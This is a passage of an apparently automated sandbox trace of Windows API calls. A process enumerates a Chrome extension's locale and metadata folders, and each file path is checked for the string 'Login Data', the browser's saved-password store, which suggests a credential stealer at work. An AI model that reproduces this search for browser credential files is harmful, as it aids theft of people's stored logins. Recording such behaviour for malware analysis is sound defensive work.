ftLastAccessTime.dwLowDateTime=0x866db650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.770] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.770] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866dc5f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866dc5f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="sv", cAlternateFileName="")) returned 1 [0161.770] lstrcmpiW (lpString1="sv", lpString2=".") returned 1 [0161.770] lstrcmpiW (lpString1="sv", lpString2="..") returned 1 [0161.770] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.772] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.772] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866dc5f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866dc5f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.772] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.772] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.772] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866db650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.773] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json", lpSrch="Login Data") returned 0x0 [0161.773] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866db650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.773] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.773] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866dc5f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866dc5f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="th", cAlternateFileName="")) returned 1 [0161.773] lstrcmpiW (lpString1="th", lpString2=".") returned 1 [0161.773] lstrcmpiW (lpString1="th", lpString2="..") returned 1 [0161.773] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.773] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.773] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866dc5f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866dc5f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.773] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.773] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.773] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866db650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xfe, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.773] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json", lpSrch="Login Data") returned 0x0 [0161.773] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866db650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xfe, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.773] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.774] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866dc5f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866dc5f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="tr", cAlternateFileName="")) returned 1 [0161.774] lstrcmpiW (lpString1="tr", lpString2=".") returned 1 [0161.774] lstrcmpiW (lpString1="tr", lpString2="..") returned 1 [0161.774] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.780] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.780] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866dc5f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x866dc5f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.780] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.780] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.780] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866db650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.780] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.780] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x866db650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.780] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.780] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="uk", cAlternateFileName="")) returned 1 [0161.780] lstrcmpiW (lpString1="uk", lpString2=".") returned 1 [0161.780] lstrcmpiW (lpString1="uk", lpString2="..") returned 1 [0161.780] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.781] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.781] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x866dc5f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.781] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.781] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.781] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.781] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json", lpSrch="Login Data") returned 0x0 [0161.781] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.781] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.781] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="vi", cAlternateFileName="")) returned 1 [0161.781] lstrcmpiW (lpString1="vi", lpString2=".") returned 1 [0161.781] lstrcmpiW (lpString1="vi", lpString2="..") returned 1 [0161.781] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.815] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.815] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.815] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.815] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.815] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe1, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.815] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.815] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe1, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.815] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.815] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0161.815] lstrcmpiW (lpString1="zh_CN", lpString2=".") returned 1 [0161.815] lstrcmpiW (lpString1="zh_CN", lpString2="..") returned 1 [0161.815] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.816] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.816] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.816] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.816] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.816] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.816] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json", lpSrch="Login Data") returned 0x0 [0161.816] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.816] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.816] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0161.816] lstrcmpiW (lpString1="zh_TW", lpString2=".") returned 1 [0161.816] lstrcmpiW (lpString1="zh_TW", lpString2="..") returned 1 [0161.816] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.817] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.817] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.817] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.817] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.817] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.817] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json", lpSrch="Login Data") returned 0x0 [0161.817] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.817] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.817] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0161.817] FindClose (in: hFindFile=0x8f9bc0 | out: hFindFile=0x8f9bc0) returned 1 [0161.818] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x867288b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8687f510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0161.818] lstrcmpiW (lpString1="_metadata", lpString2=".") returned 1 [0161.818] lstrcmpiW (lpString1="_metadata", lpString2="..") returned 1 [0161.818] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0161.818] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.818] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x867288b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8687f510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.818] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.818] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.819] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8687f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8687f510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="computed_hashes.json", cAlternateFileName="COMPUT~1.JSO")) returned 1 [0161.819] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json", lpSrch="Login Data") returned 0x0 [0161.819] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x867288b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86727140, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe051a00, ftLastWriteTime.dwHighDateTime=0x1d03f5d, nFileSizeHigh=0x0, nFileSizeLow=0x2b56, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 1 [0161.819] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json", lpSrch="Login Data") returned 0x0 [0161.819] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x867288b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86727140, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, 